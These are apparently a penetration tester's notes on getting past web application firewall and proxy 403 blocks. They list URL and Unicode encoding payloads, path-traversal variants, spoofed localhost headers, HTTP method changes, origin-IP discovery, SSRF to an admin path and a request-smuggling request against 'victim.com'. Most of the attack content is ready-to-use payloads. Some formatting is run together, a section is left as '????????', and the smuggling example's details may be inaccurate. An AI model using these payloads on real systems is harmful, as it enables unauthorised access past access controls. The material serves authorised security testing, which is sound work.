What is WAF bypass
WAF bypass occurs when there is a discrepancy between how the web application firewall (WAF) and the server interpret incoming data. Attackers exploit these differences to evade security measures. Common techniques rely on this approach to execute attacks such as cache poisoning, and other forms of web exploitation.
Client ------------------> Proxy ------------------> Server
Client <------------------ Proxy <------------------ ServerDetermining 403 Type (Proxy VS Server)
Before attempting to bypass a 403 error, the first and most crucial step is identifying whether the restriction is enforced at the proxy layer or the application layer. If the 403 originates from the proxy layer, bypassing it is often possible using various techniques. However, if the restriction is implemented at the application layer, bypassing it is generally not feasible.Determining Root Restriction
The next step is identifying the root restriction causing the 403 error. For example, if accessing /api/user/userinfo returns a 403, try visiting /api/user/FAKE. If you still receive a 403, the restriction likely applies to at least one level higher. To confirm, try accessing /api/FAKE. If this request returns a different status (e.g., 200 or 404 instead of 403), it indicates that the restriction is set at the /api/user level.Determining Progression Flow
In some cases, you can bypass the WAF when sending a request, but the response gets blocked on the way back. This can be detected with timing analysis—if a 403 normally appears in ~100ms but takes ~400ms with a different payload, the request likely reached the server, but the proxy blocked the response.Exploitation
Technique 1: URL Manipulation
URL manipulation can be used in multiple ways to bypass proxy server restrictions. The goal is to create a discrepancy between how the proxy interprets the request and how the server processes it.
URL Encoding
https://www.domain.com/%61dminhttps://www.domain.com/%25%61dmin
Unicode Encoding
https://www.domain.com/\%5cu0061dminhttps://www.domain.com/filesfi → Interpreted as "fi" on the server Special Unicode ---> https://bi.tk/utf8.html (opens in a new tab) FUZZ List ---> Unicode List (opens in a new tab)
Other technique (Path Traversal | Changing Name Convention | Path Discrepancies)
https://www.domain.com/AdMiNhttps://www.domain.com/./adminhttps://www.domain.com/#/../adminhttps://www.domain.com/admin/.https://www.domain.com//admin//https://www.domain.com/;/secrethttps://www.domain.com/.;/adminhttps://www.domain.com//;//adminhttps://www.domain.com/admin.json- ... (opens in a new tab)
| Normalization discrepancies | Front-end delimiters |
|---|---|
| ![[Pasted image 20250310084000.png]] | ![[Pasted image 20250310083942.png]] |
| More Information (opens in a new tab) |
Technique 2: Header Modification
Header modification can help bypass 403 pages. To test various header-based bypass techniques, you can use the Param Miner extension in Burp Suite.
Headers Relying on IP
X-Originating-IP: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded: 127.0.0.1Forwarded-For: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1X-Original-URL: 127.0.0.1Client-IP: 127.0.0.1True-Client-IP: 127.0.0.1Cluster-Client-IP: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1Host: localhostTry different IP ---> 127.0.0.1 | 127.0 | 127.1 | localhost | 2130706433 | ...
Other headers
Content-Length: 0---> Bypass WAF if length to big (Nowafplz (opens in a new tab))X-Rewrite-URL---> Rewrite the path
Technique 3: Change Request Method
Altering the request method in the header can potentially enable you to bypass proxy restrictions by changing how the request is processed, allowing it to evade certain filtering or blocking mechanisms typically enforced by the proxy.
Change the HTTP method used in requests:
GETPOSTPATCHPUTDELETEOPTIONSHEADCONNECTTRACEINVENTEDHACK
Technique 4: Direct IP Access
Another way to bypass a 403 error from a proxy is by directly identifying the server's IP address. In some cases, this can enable you to circumvent the proxy's filtering and access the server directly.
Tools:
- Use tools like Security Trails (opens in a new tab) for historical IP data.
- Utilize the favicon to get the original server IP by using [FOFA](FOFA Search Engine (opens in a new tab)).
- Perform DNS queries to obtain the server's origin IP.
SSRF
SSRF can also be leveraged to bypass a proxy, as the SSRF query is executed at the server level, effectively circumventing the proxy. By instructing the SSRF to retrieve elements from a 403 page, it can bypass the proxy restrictions since the proxy does not interfere with server-side requests.
http://domain.com/ssrf?url=http://domain.com/admin
Headless browser
????????
Request Smuggling
Request smuggling can be used to bypass a 403 error by crafting a request that is interpreted differently by the proxy and the back-end server. For example, a request can be sent with conflicting Content-Length and Transfer-Encoding headers, causing the proxy to process only the first part of the request while the back-end server processes both parts. This allows the smuggled request to bypass the proxy’s restrictions, potentially accessing resources that would otherwise return a 403 error.
Example:
POST / HTTP/1.1
Host: victim.com
Content-Length: 13
Transfer-Encoding: chunked
0
POST /restricted HTTP/1.1
Host: victim.com
Content-Length: 5In this case, the proxy may block the /restricted path, but the back-end server will process the second POST /restricted request, bypassing the proxy and avoiding the 403 error.